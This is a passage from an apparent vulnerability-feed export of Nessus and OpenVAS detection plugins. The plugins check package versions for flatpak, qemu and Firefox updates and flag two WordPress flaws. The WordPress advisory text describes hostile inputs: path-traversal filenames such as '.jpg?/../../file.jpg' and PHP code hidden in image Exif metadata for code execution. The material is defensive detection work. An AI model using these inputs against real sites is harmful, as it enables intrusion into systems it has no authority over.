script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"flatpak-1.0.2-4.vl7\",\n \"flatpak-builder-1.0.0-4.vl7\",\n \"flatpak-devel-1.0.2-4.vl7\",\n \"flatpak-libs-1.0.2-4.vl7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-7\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flatpak / flatpak-builder / flatpak-devel / etc\");\n}\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP networking implementation (bsc#1123156).\n\nCVE-2018-19489: Fixed a denial of service vulnerability in virtfs (bsc#1117275).\n\nCVE-2018-19364: Fixed a use-after-free if the virtfs interface resulting in a denial of service (bsc#1116717).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SUSE_SU-2019-0457-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122397", "title": "SUSE SLES12 Security Update : qemu (SUSE-SU-2019:0457-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0457-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122397);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-19364\", \"CVE-2018-19489\", \"CVE-2019-6778\");\n\n script_name(english:\"SUSE SLES12 Security Update : qemu (SUSE-SU-2019:0457-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6778: Fixed a heap buffer overflow issue in the SLiRP\nnetworking implementation (bsc#1123156).\n\nCVE-2018-19489: Fixed a denial of service vulnerability in virtfs\n(bsc#1117275).\n\nCVE-2018-19364: Fixed a use-after-free if the virtfs interface\nresulting in a denial of service (bsc#1116717).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1116717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1117275\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1123156\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-19489/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6778/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190457-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2198160c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2019-457=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = eregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! ereg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-x86-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"qemu-s390-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-block-curl-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-block-curl-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-debugsource-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-guest-agent-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-guest-agent-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-lang-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-tools-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-tools-debuginfo-2.0.2-48.49.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"qemu-kvm-2.0.2-48.49.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:09", "bulletinFamily": "scanner", "description": "Security Fix(es) :\n\nThis update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia (CVE-2018-18356) * mozilla: Integer overflow in Skia (CVE-2019-5785)", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "SL_20190221_FIREFOX_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122390", "title": "Scientific Linux Security Update : firefox on SL7.x x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122390);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/22 10:34:40\");\n\n script_cve_id(\"CVE-2018-18356\", \"CVE-2019-5785\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL7.x x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\nThis update upgrades Firefox to version 60.5.1 ESR.\n\nSecurity Fix(es) :\n\n - chromium-browser, mozilla: Use after free in Skia\n (CVE-2018-18356) * mozilla: Integer overflow in Skia\n (CVE-2019-5785)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1902&L=SCIENTIFIC-LINUX-ERRATA&P=7521\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b4b0ed4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.5.1-1.el7_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.5.1-1.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-02-23T01:52:08", "bulletinFamily": "scanner", "description": "An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed desktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-02-22T00:00:00", "id": "CENTOS_RHSA-2019-0375.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=122353", "published": "2019-02-21T00:00:00", "title": "CentOS 7 : flatpak (CESA-2019:0375)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0375 and \n# CentOS Errata and Security Advisory 2019:0375 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122353);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/22 10:34:41\");\n\n script_cve_id(\"CVE-2019-8308\");\n script_xref(name:\"RHSA\", value:\"2019:0375\");\n\n script_name(english:\"CentOS 7 : flatpak (CESA-2019:0375)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for flatpak is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nFlatpak is a system for building, distributing, and running sandboxed\ndesktop applications on Linux.\n\nSecurity Fix(es) :\n\n* flatpak: potential /proc based sandbox escape (CVE-2019-8308)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2019-February/023203.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a8b1c87d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flatpak packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-builder\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:flatpak-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-builder-1.0.0-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-devel-1.0.2-4.el7_6\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"flatpak-libs-1.0.2-4.el7_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-02-22T13:13:36", "bulletinFamily": "scanner", "description": "WordPress allows Path Traversal in wp_crop_image(). An attacker (who has\nprivileges to crop an image) can write the output image to an arbitrary directory via a filename containing two\nimage extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "OPENVAS:1361412562310142032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142032", "title": "WordPress <= 5.0.3 Path Traversal Vulnerability (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142032\");\n script_version(\"$Revision: 13826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 08:18:35 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-22 14:19:50 +0700 (Fri, 22 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-8943\");\n script_bugtraq_id(107089);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_name(\"WordPress <= 5.0.3 Path Traversal Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"wordpress/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"WordPress allows Path Traversal in wp_crop_image(). An attacker (who has\nprivileges to crop an image) can write the output image to an arbitrary directory via a filename containing two\nimage extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring.\");\n\n script_tag(name:\"affected\", value:\"WordPress version 5.0.3 and prior.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"No known solution is available as of 22nd February, 2019.\nInformation regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\ninfos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE);\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less_equal(version: version, test_version: \"5.0.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"None\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-02-22T13:13:36", "bulletinFamily": "scanner", "description": "WordPress allows remote code execution because an _wp_attached_file Post Meta\nentry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with\nauthor privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif\nmetadata. Exploitation can leverage CVE-2019-8943.", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "OPENVAS:1361412562310142029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142029", "title": "WordPress RCE Vulnerability CVE-2019-8942 (Linux)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:wordpress:wordpress\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142029\");\n script_version(\"$Revision: 13826 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-22 08:18:35 +0100 (Fri, 22 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-02-22 13:59:06 +0700 (Fri, 22 Feb 2019)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2019-8942\");\n script_bugtraq_id(107088);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"WordPress RCE Vulnerability CVE-2019-8942 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_wordpress_detect_900182.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"wordpress/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"WordPress allows remote code execution because an _wp_attached_file Post Meta\nentry can be changed to an arbitrary string, such as one ending with a .jpg?file.php substring. An attacker with\nauthor privileges can execute arbitrary code by uploading a crafted image containing PHP code in the Exif\nmetadata. Exploitation can leverage CVE-2019-8943.\");\n\n script_tag(name:\"affected\", value:\"WordPress prior version 4.9.9 and 5.0.1.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.9.9, 5.0.1 or later.\");\n\n script_xref(name:\"URL\", value:\"https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\ninfos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE);\nversion = infos['version'];\npath = infos['location'];\n\nif (version_is_less(version: version, test_version: \"4.9.9\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.9.9\", install_path: path);\n security_message(port: port, data: report);\n 